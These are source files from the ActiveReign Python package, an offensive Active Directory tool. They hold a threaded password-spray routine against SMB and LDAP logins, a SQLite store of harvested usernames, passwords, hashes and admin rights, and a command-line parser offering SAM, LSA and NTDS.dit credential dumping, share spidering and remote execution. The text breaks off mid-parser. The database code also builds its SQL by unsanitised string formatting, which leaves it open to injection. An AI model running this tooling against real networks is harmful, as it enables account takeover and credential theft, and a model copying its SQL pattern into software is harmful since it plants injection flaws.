loggers['console'].info("\033[1;30mPerforming Password Spray @ {} [Users: {}] [Password: {}] [Method: {}]\033[0m".format(get_timestamp(),len(args.user), passwd, args.method))
# Start
for target in args.target:
for user in args.user:
# Last minute adjustments to spray values
if args.combo:
user, passwd = user.split(':')
if args.user_as_pass:
passwd = user.strip()
elif args.hash:
passwd = ''
# Create new namespace to pass to spray handler
auth_args = Namespace(user = user,
passwd = passwd,
hash = args.hash,
domain = args.domain,
local_auth = args.local_auth,
debug = args.debug,
timeout = args.timeout,
method = args.method,
mode = args.mode,
user_as_pass = args.user_as_pass,
jitter = args.jitter
)
t= Thread(target=spray, args=(auth_args, loggers, db_obj, config_obj, target, user, passwd,))
t.daemon=True
t.start()
while activeCount() > args.max_threads:
sleep(0.001)
while activeCount() > 1:
sleep(0.001)
def spray(auth_args, loggers, db_obj, config_obj, target, user, passwd):
try:
if auth_args.method.lower() == "ldap":
con = LdapCon(auth_args, loggers, target, db_obj)
con.create_ldap_con()
elif auth_args.method.lower() == 'smb':
con = SmbCon(auth_args, loggers, target, db_obj)
con.create_smb_con()
if auth_args.hash: passwd = auth_args.hash
if hasattr(con, 'admin')and con.admin == True:
loggers['console'].success([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight(config_obj.PWN3D_MSG, 'yellow'))])
else:
loggers['console'].success([con.host, con.ip, auth_args.method.upper(),'{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight("SUCCESS", "green"))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tSuccess".format(get_timestamp(), target, auth_args.domain, user, passwd))
con.close()
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
try:
con.close()
except:
pass
_exit(0)
except Exception as e:
# Overwrite pwd value for output
if auth_args.hash: passwd = auth_args.hash
if "password has expired" in str(e).lower():
loggers['console'].success2([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("PASSWORD EXPIRED", color='yellow'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tPassword Expired".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif "account_locked_out" in str(e).lower():
loggers['console'].warning([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("ACCOUNT LOCKED", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tAccount Locked".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif str(e) == "Connection to Server Failed":
loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("CONNECTION ERROR", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tConnection Error".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif "status_logon_failure" in str(e).lower() or "invalidCredentials" in str(e).lower():
loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("FAILED", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tLogin Failed".format(get_timestamp(), target, auth_args.domain, user, passwd))
else:
loggers['console'].debug([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight(str(e), color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\t{}".format(get_timestamp(), target, auth_args.domain, user, passwd, str(e)))
sleep(auth_args.jitter)
del auth_args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/spray/__init__.py | __init__.py |
import os
import logging
from cmd import Cmd
from ar3.ops.db import db_query
from ar3.ops.db.db_core import Ar3db
from ar3.logger import setup_logger
class AR3DBSHELL(Cmd):
def __init__(self, logger):
super(AR3DBSHELL, self).__init__()
self.prompt = "AR3DB> "
self.logger = logger
self.workspace = 'default'
self.workspace_path = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces')
self.db = Ar3db(self.workspace, self.logger, False)
def do_workspace(self, args):
if args == "list":
for x in os.listdir(self.workspace_path):
self.logger.output(x)
elif args:
if os.path.exists(self.workspace_path + "/{}".format(args)):
self.workspace = args
self.db = Ar3db(self.workspace, self.logger, False)
self.logger.success("Workspace changed successfully: {}".format(args))
else:
self.logger.fail("Invalid workspace provided: Use \"workspace list\" for more")
else:
self.logger.fail("No workspace provided:")
self.logger.output(" List Workspaces : \"workspace list\"")
self.logger.output(" Change Workspaces : \"workspace demo.local\"")
def do_users(self, args):
if args:
db_query.user_lookup(self.db, self.logger, args)
else:
db_query.users(self.db, self.logger)
def do_creds(self, args):
if args:
db_query.user_lookup(self.db, self.logger, args)
else:
db_query.creds(self.db, self.logger)
def do_groups(self, args):
if args:
db_query.group_lookup(self.db, self.logger, args)
else:
db_query.groups(self.db, self.logger)
def do_hosts(self, args):
if args:
db_query.host_lookup(self.db, self.logger, args)
else:
db_query.hosts(self.db, self.logger)
def do_domains(self, args):
db_query.domains(self.db, self.logger)
def do_exit(self, args):
raise SystemExit
def shell(logger):
while True:
try:
shell = AR3DBSHELL(logger)
shell.cmdloop()
except Exception as e:
logger.warning("AR3DB shell error: {}".format(str(e)))
def main():
logger = setup_logger(logging.INFO, 'ar3')
shell(logger) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/db/db_shell.py | db_shell.py |
from sys import exit
def db_args(sub_parser):
usage = """
Insert Example:\n activereign db insert -u admin -p Password1 -d demo.local
"""
db_parser = sub_parser.add_parser("db", description=usage, help='- Query or insert data into Ar3db')
search_args = db_parser.add_argument_group("Search Options")
search_args.add_argument(dest='db_table', nargs='+', help='Ar3db action/table (\"ar3 db help\" for more)')
id_arg = search_args.add_mutually_exclusive_group(required=False)
id_arg.add_argument('-id', dest='id', type=int, help='Lookup row by ID')
id_arg.add_argument('-n','--name', type=str, default='', help='Lookup row by name')
insert_args = db_parser.add_argument_group("Insert Values")
insert_args.add_argument('-u', dest='user', type=str, default='', help='Insert User account into db')
insert_args.add_argument('-p', dest='password', type=str, default='', help='Insert into db: Password (Default: None)')
insert_args.add_argument('-H', '--hashes', dest='hash', type=str, default='', help='Insert into db: Hash (Default: None)')
insert_args.add_argument('-d', dest='domain', type=str, default='', help='Insert into db: Domain')
insert_args.add_argument('-t', '--threshold', dest='lockout_threshold', type=int, default=False, help='Domain/System Lockout Threshold')
def db_arg_mods(args, db_obj, loggers):
# Approved actions
actions = ['insert', 'users', 'creds', 'hosts', 'computers', 'groups', 'domains', 'rebuild', 'info', 'shell', 'help']
actions_help = """ \033[01;30mTables\n >>------------>\033[0m
domains : List all domains
users : List all users
creds : List all credentials
groups : List all groups
computers : List all computers
\033[01;30mOperations\n >>------------>\033[0m
rebuild : Delete current database and wipe all data
insert : Insert user or domain into database for enumeration
user : ar3 db insert -u admin -p password -d demo.local
domain : ar3 db insert -d demo.local -t 5
"""
args.db_table = args.db_table[0].lower()
if args.db_table not in actions:
loggers['console'].fail('Invalid operation requested: \"{}\"'.format(args.db_table))
loggers['console'].fail('Use \"ar3 db help\" to list all options'.format(args.db_table))
exit(1)
elif args.db_table == 'help':
loggers['console'].info("ActiveReign Database")
loggers['console'].output(actions_help)
exit(0)
return args | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/db/arg_parser.py | arg_parser.py |
from terminaltables import AsciiTable
def rebuild(db_obj, logger):
try:
db_obj.db_rebuild()
logger.success("Database has been rebuilt\n")
except Exception as e:
logger.fail(str(e))
def domains(db_obj, logger):
select_data = db_obj.query_domains()
db_title = "DOMAINS"
header = [("DOMAIN ID", "DOMAIN", "LOCKOUT THRESHOLD", "LOCKOUT DURATION", "MIN PWD LENGTH", "MAX PWD AGE")]
display_data(select_data, logger, db_title, header)
def hosts(db_obj, logger):
select_data = db_obj.query_hosts()
header = [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING", "ADMIN(s)")]
db_title = "HOSTS"
display_data(select_data, logger, db_title, header)
def host_lookup(db_obj, logger, id, name=False):
# Define Lookup type
search = "HOSTS.HOSTID = '{}'".format(id)
if name:
search = "HOSTS.HOSTNAME LIKE '%{}%'".format(name)
# Host Lookup
sql = """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING FROM HOSTS WHERE {};""".format(search)
select_data = db_obj.custom_query(sql)
header = [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING")]
db_title = "HOSTS"
display_data(select_data, logger, db_title, header)
# Admin Lookup
select_data = db_obj.query_spec_host(search)
header = [("HOSTID", "DOMAIN", "HOSTNAME", "IP", "OS", "SIGNING", "ADMIN(s)", "USER DOMAIN", "PASSWORD", "HASH")]
db_title = "ADMINS"
display_data(select_data, logger, db_title, header)
def users(db_obj, logger):
select_data = db_obj.query_users()
header = [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH", "ADMIN ON", "MEMBER OF")]
db_title = "USERS"
display_data(select_data, logger, db_title, header)
def user_lookup(db_obj, logger, id, name=False):
# Define Lookup type
field = 'USERID'
value = id
if name:
field = 'USERNAME'
value = name
# User Lookup
sql = """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH FROM USERS WHERE USERS.{} = '{}';""".format(field,value)
select_data = db_obj.custom_query(sql)
header = [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH")]
db_title = "USER"
display_data(select_data, logger, db_title, header)
# User Host Lookup
sql = """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS FROM USERS INNER JOIN ADMINS ON USERS.USERID = ADMINS.USERID INNER JOIN HOSTS ON ADMINS.HOSTID = HOSTS.HOSTID WHERE USERS.{} = '{}';""".format(field,value)
select_data = db_obj.custom_query(sql)
header = [("USERID", "DOMAIN", "USERNAME", "HOSTID", "HOST DOMAIN", "HOSTNAME", "IP", "OS")]
db_title = "HOSTS"
display_data(select_data, logger, db_title, header)
# User Member Lookup
sql = """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME FROM USERS INNER JOIN MEMBERS_USERS ON USERS.USERID = MEMBERS_USERS.USERID INNER JOIN GROUPS ON MEMBERS_USERS.GROUPID = GROUPS.GROUPID WHERE USERS.{} = '{}';""".format(field,value)
select_data = db_obj.custom_query(sql)
header = [("USERID", "DOMAIN", "USERNAME", "GROUPID", "GROUP DOMAIN", "GROUP NAME")]
db_title = "GROUPS"
display_data(select_data, logger, db_title, header)
def creds(db_obj, logger):
select_data = db_obj.query_creds()
header = [("USERID", "DOMAIN", "USERNAME", "PASSWORD", "HASH", "ADMIN ON")]
db_title = "CREDS"
display_data(select_data, logger, db_title, header)
def groups(db_obj, logger):
select_data = db_obj.query_groups()
header = [("GROUPID", "DOMAIN", "NAME", "MEMBERS: USERS", "MEMBERS: GROUPS")]
db_title = "GROUPS"
display_data(select_data, logger, db_title, header)
def group_lookup(db_obj, logger, id, name=False):
search = "GROUPS.GROUPID = '{}'".format(id)
if name:
search = "GROUPS.NAME LIKE '%{}%'".format(name)
sql="""SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, USERS.USERID, USERS.USERNAME, USERS.DOMAIN, USERS.PASSWORD, USERS.HASH FROM GROUPS INNER JOIN MEMBERS_USERS ON MEMBERS_USERS.GROUPID = GROUPS.GROUPID INNER JOIN USERS ON MEMBERS_USERS.USERID = USERS.USERID WHERE {};""".format(search)
select_data = db_obj.custom_query(sql)
header = [("GROUPID", "DOMAIN", "NAME", "USERID", "USERNAME", "USER DOMAIN", "PASSWORD", "HASH")]
db_title = "MEMBERS: USERS"
display_data(select_data, logger, db_title, header)
sql = """SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, MEMBERS_GROUPS.GMID,(SELECT GROUPS.DOMAIN FROM GROUPS WHERE GROUPS.GROUPID = MEMBERS_GROUPS.GMID), (SELECT GROUPS.NAME FROM GROUPS WHERE GROUPS.GROUPID = MEMBERS_GROUPS.GMID) FROM GROUPS INNER JOIN MEMBERS_GROUPS ON GROUPS.GROUPID = MEMBERS_GROUPS.GROUPID WHERE {};""".format(search)
select_data = db_obj.custom_query(sql)
header = [("GROUPID", "DOMAIN", "NAME", "GROUP MEMBER ID", "GROUP MEMBER DOMAIN", "GROUP MEMBER NAME")]
db_title = "MEMBERS: GROUPS"
display_data(select_data, logger, db_title, header)
def display_data(data, logger, db_title=None, headers=''):
# Display data in ascii table format
if data:
table = AsciiTable(headers + data)
if db_title:
table.title = db_title
logger.output(table.table) | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/db/db_query.py | db_query.py |
from sqlite3 import connect
from os import remove, path
class Ar3db():
__sql_create_domains = ('CREATE TABLE IF NOT EXISTS DOMAINS (DOMAINID INTEGER PRIMARY KEY AUTOINCREMENT,'
'NAME TEXT NOT NULL,'
'LOCKOUT_THRESHOLD INTEGER,'
'LOCKOUT_DURATION TEXT,'
'MIN_PWD_LENGTH INTEGER,'
'MAX_PWD_AGE TEXT);')
__sql_create_hosts = ('CREATE TABLE IF NOT EXISTS HOSTS (HOSTID INTEGER PRIMARY KEY AUTOINCREMENT,'
'HOSTNAME TEXT,'
'IP TEXT,'
'DOMAIN TEXT,'
'OS TEXT,'
'SIGNING BOOL);')
__sql_create_users = ('CREATE TABLE IF NOT EXISTS USERS (USERID INTEGER PRIMARY KEY AUTOINCREMENT,'
'USERNAME TEXT NOT NULL,'
'PASSWORD TEXT,'
'DOMAIN TEXT,'
'HASH TEXT);')
__sql_create_admin = ('CREATE TABLE IF NOT EXISTS ADMINS (ADMINID INTEGER PRIMARY KEY AUTOINCREMENT,'
'HOSTID INTEGER NOT NULL,'
'USERID INTEGER NOT NULL);')
__sql_create_groups = ('CREATE TABLE IF NOT EXISTS GROUPS (GROUPID INTEGER PRIMARY KEY AUTOINCREMENT,'
'DOMAIN TEXT,'
'NAME TEXT NOT NULL);')
__sql_create_user_members = ('CREATE TABLE IF NOT EXISTS MEMBERS_USERS (MEMBERID INTEGER PRIMARY KEY AUTOINCREMENT,'
'GROUPID INTEGER NOT NULL,'
'USERID INTEGER NOT NULL);')
__sql_create_group_members = ('CREATE TABLE IF NOT EXISTS MEMBERS_GROUPS (MEMBERID INTEGER PRIMARY KEY AUTOINCREMENT,'
'GROUPID INTEGER NOT NULL,'
'GMID INTEGER NOT NULL);')
def __init__(self, workspace, logger, debug=False):
self.logger = logger
self.debug = debug
self.db_dir = path.join(path.expanduser('~'), '.ar3', 'workspaces', workspace)
self.dbname = path.join(self.db_dir, 'ar3.db')
###########################
# DB connection/interaction
###########################
def db_connect(self, dbname):
try:
return connect(dbname, timeout=3, check_same_thread=False)
except Exception as e:
self.logger.debug(str(e))
return False
def db_init(self):
try:
con = self.db_connect(self.dbname)
self.db_exec(con, self.__sql_create_domains)
self.db_exec(con, self.__sql_create_hosts)
self.db_exec(con, self.__sql_create_users)
self.db_exec(con, self.__sql_create_admin)
self.db_exec(con, self.__sql_create_groups)
self.db_exec(con, self.__sql_create_user_members)
self.db_exec(con, self.__sql_create_group_members)
con.close()
return True
except Exception as e:
print(e)
self.logger.debug(str(e))
return False
def db_exec(self, con, query):
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
con.commit()
cur.close()
return data
def db_rebuild(self):
try:
self.db_remove()
self.db_init()
return True
except:
return False
def db_remove(self):
remove(self.dbname)
def close(self,con):
con.close()
###########################
# Retrieve Unique ID
###########################
def domain_id(self, con, domain):
try:
return self.db_exec(con, """SELECT DOMAINID FROM DOMAINS WHERE NAME='{}' LIMIT 1;""".format(domain))[0][0]
except:
return False
def host_id(self, con, host):
try:
return self.db_exec(con, """SELECT HOSTID FROM HOSTS WHERE HOSTNAME='{}' LIMIT 1;""".format(host))[0][0]
except:
return False
def user_id(self, con, username, domain):
try:
return self.db_exec(con, """SELECT USERID FROM USERS WHERE USERNAME='{}' AND DOMAIN='{}' LIMIT 1;""".format(username, domain))[0][0]
except:
return False
def cred_id(self, con, username, domain, password, hash):
try:
return self.db_exec(con, """SELECT USERID FROM USERS WHERE USERNAME='{}' AND DOMAIN='{}' AND PASSWORD='{}' AND HASH='{}' LIMIT 1;""".format(username, domain, password, hash))[0][0]
except:
return False
def group_id(self, con, group_name, domain):
try:
return self.db_exec(con, """SELECT GROUPID FROM GROUPS WHERE NAME='{}' AND DOMAIN='{}' LIMIT 1;""".format(group_name, domain))[0][0]
except:
return False
###########################
# Update records
###########################
def update_domain(self, domain, lockout_threshold):
con = self.db_connect(self.dbname)
id = self.domain_id(con, domain.lower())
if id:
self.db_exec(con, """UPDATE DOMAINS SET NAME='{}', LOCKOUT_THRESHOLD='{}' WHERE DOMAINID={};""".format(domain.lower(), lockout_threshold, id))
else:
self.db_exec(con, """INSERT INTO DOMAINS (NAME, LOCKOUT_THRESHOLD) VALUES ('{}','{}');""".format(domain.lower(), lockout_threshold))
con.close()
def update_domain_ldap(self, domain, threshold, duration, length, age):
# Update all values in domain policy
con = self.db_connect(self.dbname)
id = self.domain_id(con, domain.lower())
if id:
self.db_exec(con, """UPDATE DOMAINS SET NAME='{}', LOCKOUT_THRESHOLD='{}', LOCKOUT_DURATION='{}', MIN_PWD_LENGTH='{}', MAX_PWD_AGE='{}' WHERE DOMAINID={};""".format(domain.lower(), threshold, duration, length, age, id))
else:
self.db_exec(con, """INSERT INTO DOMAINS (NAME, LOCKOUT_THRESHOLD, LOCKOUT_DURATION, MIN_PWD_LENGTH, MAX_PWD_AGE) VALUES ('{}','{}','{}','{}','{}');""".format(domain.lower(), threshold, duration, length, age))
con.close()
def update_host(self, hostname, ip, domain, os, signing):
con = self.db_connect(self.dbname)
id = self.host_id(con, hostname.lower())
if id:
self.db_exec(con,"""UPDATE HOSTS SET HOSTNAME='{}', IP='{}', DOMAIN='{}', OS='{}', SIGNING='{}' WHERE HOSTID={};""".format(hostname.lower(), ip, domain.lower(), os, signing, id))
else:
self.db_exec(con, """INSERT OR REPLACE INTO HOSTS(HOSTNAME, IP, DOMAIN, OS, signing) VALUES ('{}','{}','{}','{}', '{}');""".format(hostname.lower(), ip, domain.lower(), os, signing))
con.close()
def update_host_ldap(self, hostname, ip, domain, os):
# Update host using ldap information
con = self.db_connect(self.dbname)
id = self.host_id(con, hostname.lower())
if id:
self.db_exec(con,"""UPDATE HOSTS SET HOSTNAME='{}', IP='{}', DOMAIN='{}', OS='{}' WHERE HOSTID={};""".format(hostname.lower(), ip, domain.lower(), os, id))
else:
self.db_exec(con, """INSERT OR REPLACE INTO HOSTS(HOSTNAME, IP, DOMAIN, OS) VALUES ('{}','{}','{}','{}');""".format(hostname.lower(), ip, domain.lower(), os))
con.close()
def update_user(self, username, passwd, domain, hash):
con = self.db_connect(self.dbname)
id = self.user_id(con, username.lower(), domain.lower())
if id:
self.db_exec(con,"""UPDATE USERS SET USERNAME='{}', PASSWORD='{}', DOMAIN='{}', HASH='{}' WHERE USERID={};""".format(username.lower(), passwd, domain.lower(), hash, id))
else:
self.db_exec(con,"""INSERT INTO USERS (USERNAME, PASSWORD, DOMAIN, HASH) VALUES ('{}','{}','{}','{}');""".format(username.lower(), passwd, domain.lower(), hash))
con.close()
def update_username(self, domain, username):
# Update username and domain values without effecting password/hash values
con = self.db_connect(self.dbname)
uid = self.user_id(con, username.lower(), domain.lower())
if uid:
self.db_exec(con, """UPDATE USERS SET USERNAME='{}', DOMAIN='{}' WHERE USERID={};""".format(username.lower(), domain.lower(), uid))
else:
self.db_exec(con, """INSERT INTO USERS (USERNAME, DOMAIN) VALUES ('{}','{}');""".format(username.lower(), domain.lower()))
con.close()
def update_user_members(self, domain, username, group_name):
con = self.db_connect(self.dbname)
uid = self.user_id(con, username.lower(), domain.lower())
gid = self.group_id(con, group_name, domain.lower())
self.db_exec(con, """INSERT INTO MEMBERS_USERS (GROUPID, USERID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT MEMBERID FROM MEMBERS_USERS WHERE GROUPID={0} AND USERID={1});""".format(gid, uid))
con.close()
def update_group_members(self, domain, group_member, group_name):
con = self.db_connect(self.dbname)
gmid = self.group_id(con, group_member, domain.lower())
gid = self.group_id(con, group_name, domain.lower())
self.db_exec(con, """INSERT INTO MEMBERS_GROUPS (GROUPID, GMID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT MEMBERID FROM MEMBERS_GROUPS WHERE GROUPID={0} AND GMID={1});""".format(gid, gmid))
con.close()
return
def update_group(self, group_name, domain):
try:
group_name = group_name.replace("'", "").replace('"', "")
con = self.db_connect(self.dbname)
id = self.group_id(con, group_name, domain.lower())
if id:
self.db_exec(con,"""UPDATE GROUPS SET DOMAIN='{}', NAME='{}' WHERE GROUPID={};""".format(domain.lower(), str(group_name), id))
else:
self.db_exec(con,"""INSERT INTO GROUPS (DOMAIN, NAME) VALUES ('{}','{}');""".format(domain.lower(), str(group_name)))
con.close()
except Exception as e:
self.logger.debug(['DB GROUPS', group_name, domain, str(e)])
def update_admin(self, username, domain, hostname):
con = self.db_connect(self.dbname)
hid = self.host_id(con, hostname.lower())
uid = self.user_id(con, username.lower(), domain.lower())
self.db_exec(con, """INSERT INTO ADMINS (USERID, HOSTID) SELECT '{0}', '{1}' WHERE NOT EXISTS(SELECT ADMINID FROM ADMINS WHERE USERID={0} AND HOSTID={1});""".format(uid, hid))
con.close()
###########################
# General queries (Returns all data)
###########################
def query_domains(self):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT * FROM DOMAINS;""")
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
def query_groups(self):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT GROUPS.GROUPID, GROUPS.DOMAIN, GROUPS.NAME, (SELECT (COUNT(MEMBERS_USERS.USERID)|| ' User(s)') FROM MEMBERS_USERS WHERE MEMBERS_USERS.GROUPID = GROUPS.GROUPID), (SELECT (COUNT(MEMBERS_GROUPS.GMID)|| ' Group(s)') FROM MEMBERS_GROUPS WHERE MEMBERS_GROUPS.GROUPID = GROUPS.GROUPID) FROM GROUPS ORDER BY GROUPS.NAME;""")
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
def query_hosts(self):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING, (SELECT (COUNT(ADMINS.USERID) || ' User(s)') FROM ADMINS WHERE ADMINS.HOSTID = HOSTS.HOSTID) FROM HOSTS;""")
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
def query_users(self):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH, (SELECT (COUNT(ADMINS.HOSTID) || ' Host(s)') FROM ADMINS WHERE ADMINS.USERID = USERS.USERID), (SELECT (COUNT(MEMBERS_USERS.GROUPID) || ' Groups(s)') FROM MEMBERS_USERS WHERE MEMBERS_USERS.USERID = USERS.USERID) FROM USERS ORDER BY USERS.USERNAME;""")
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
def query_creds(self):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT USERS.USERID, USERS.DOMAIN, USERS.USERNAME, USERS.PASSWORD, USERS.HASH, (SELECT (COUNT(ADMINS.HOSTID) || ' Host(s)') FROM ADMINS WHERE ADMINS.USERID = USERS.USERID) FROM USERS WHERE USERS.hash iS NOT NULL OR USERS.PASSWORD IS NOT NULL;""")
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
###########################
# Query specific value
###########################
def custom_query(self, sql):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, sql)
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
def query_spec_host(self, search):
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT HOSTS.HOSTID, HOSTS.DOMAIN, HOSTS.HOSTNAME, HOSTS.IP, HOSTS.OS, HOSTS.SIGNING, USERS.USERNAME, USERS.DOMAIN, USERS.PASSWORD, USERS.HASH FROM HOSTS INNER JOIN ADMINS ON HOSTS.HOSTID = ADMINS.HOSTID INNER JOIN USERS ON USERS.USERID = ADMINS.USERID WHERE {};""".format(search))
con.close()
return tmp
except Exception as e:
self.logger.debug(str(e))
return [[]]
###############################
# Extract value for use in Enum
###############################
def extract_user(self, userid):
# Used to extract creds from db for enumeration
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT USERNAME, PASSWORD, HASH, DOMAIN FROM USERS WHERE USERID={}""".format(userid))
con.close()
return tmp
except Exception as e:
return [[]]
def extract_lockout(self, domain):
tmp = False
con = self.db_connect(self.dbname)
try:
id = self.domain_id(con, domain)
tmp = self.db_exec(con, """SELECT LOCKOUT_THRESHOLD FROM DOMAINS WHERE DOMAINID={} LIMIT 1;""".format(id))[0][0]
except:
pass
con.close()
return tmp
def extract_credID(self, username, domain, password, hash):
con = self.db_connect(self.dbname)
id = self.cred_id(con, username, domain, password, hash)
con.close()
return id
def pwd_check(self, domain, username):
# Domain pwd spray, check creds dont exist in DB
tmp = False
con = self.db_connect(self.dbname)
try:
con = self.db_connect(self.dbname)
tmp = self.db_exec(con, """SELECT PASSWORD FROM USERS WHERE DOMAIN='{}' AND USERNAME='{}' LIMIT 1""".format(domain, username))[0][0]
except:
pass
con.close()
return tmp | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/ar3/ops/db/db_core.py | db_core.py |
import os
import argparse
from sys import argv, exit
from getpass import getpass
from ipparser import ipparser
from ar3.core.ldap import LdapCon
from ar3.modules import list_modules
from ar3.helpers.misc import file_exists
from ar3.modules import get_module_resources
def enum_args(sub_parser):
enum_parser = sub_parser.add_parser("enum", help='- System enumeration & Module execution')
if "-L" in argv:
list_modules()
exit(0)
enum_parser.add_argument('-t', dest='timeout', type=int, default=12,help='Connection timeout')
enum_parser.add_argument('--refresh', dest="refresh", action='store_true', help="Download/update PowerShell scripts")
enum_parser.add_argument('--gen-relay-list', dest='gen_relay_list', type=str, default='', help='Create a file of all hosts that dont require SMB signing')
auth = enum_parser.add_argument_group("Host Authentication")
auth.add_argument('-u', dest='user', type=str, default='', required=False,help='Set username (Default=null)')
auth_pwd = auth.add_mutually_exclusive_group(required=False)
auth_pwd.add_argument('-H', '-hashes', dest='hash', type=str, default='', help='Use Hash for authentication')
auth_pwd.add_argument('-p', dest='passwd', type=str, default='', help='Set password (Default=null)')
auth.add_argument('-id', dest='cred_id', type=int, help='Use creds from db for ldap queries/enumeration')
auth.add_argument('-d', dest='domain', type=str, default='', help='Set domain (Default=null)')
auth.add_argument('--local-auth', dest='local_auth', action='store_true', help='Authenticate to target host, no domain')
auth.add_argument('--threshold', dest='lockout_threshold', type=int, default=3,help='Domain/System Lockout Threshold ''(Exits 1 attempt before lockout)')
enum = enum_parser.add_argument_group("Enumerating Options")
enum.add_argument('--pass-pol', dest="passpol", action='store_true', help="Enumerate password policy")
enum.add_argument('--loggedon', dest='loggedon', action='store_true', help='Enumerate logged on users')
enum.add_argument('--sessions', dest='sessions', action='store_true', help='Enumerate active sessions')
enum.add_argument('--services', dest='list_services', action='store_true', help='List services & status')
enum.add_argument('-s', '--sharefinder', dest="sharefinder", action='store_true',help="Find open file shares & check access")
creds = enum_parser.add_argument_group("Gathering Credentials")
creds.add_argument('--sam', dest='sam', action='store_true', help='Dump local SAM db')
creds.add_argument('--lsa', dest='lsa', action='store_true', help='Extract LSA Secrets')
creds.add_argument('--ntds', dest='ntds', action='store_true', help='Extract NTDS.dit file')
creds.add_argument('--use-vss', action='store_true', default=False, help='Use the VSS method insead of default DRSUAPI')
wmi = enum_parser.add_argument_group("WMI Query")
wmi.add_argument('--tasklist', dest='list_processes', action='store_true', help='Show running processes')
wmi.add_argument('--local-groups', dest='local_groups', action='store_true', help='List system local groups')
wmi.add_argument('--local-members', dest='local_members', type=str, default='', help='List local group members')
wmi.add_argument('--wmi', dest='wmi_query', type=str, default='', help='Execute WMI query')
wmi.add_argument('--wmi-namespace', dest='wmi_namespace', type=str, default='root\\cimv2', help='WMI namespace (Default: root\\cimv2)')
modules = enum_parser.add_argument_group("Module Execution")
modules.add_argument('-M', dest='module', type=str, default='', help='Use AR3 module')
modules.add_argument('-o', dest='module_args', type=str, default='', help='Provide AR3 module arguments')
modules.add_argument('-L', dest='list_modules', type=str, default='', help='List all available modules')
modules.add_argument('--reload', dest='module_reload', action='store_true', help='ReDownload module resources')
spider = enum_parser.add_argument_group("Spidering")
spider.add_argument('--spider', dest='spider', action='store_true',help='Crawl file share and look for sensitive info')
spider.add_argument('--depth', dest='max_depth', type=int, default=5, help='Set scan depth (Default: 3)')
spider.add_argument('--share', dest='share', type=str, default='', help='Define network share to scan: \'C$\'')
spider.add_argument('--path', dest='start_path', type=str, default='/', help='Define starting path for share: \'/Windows/Temp/\'')
spider.add_argument('--filename', dest="filename_only", action='store_true', help="Scan Filenames & extensions only")
execution = enum_parser.add_argument_group("Command Execution")
ps1exec = execution.add_mutually_exclusive_group(required=False)
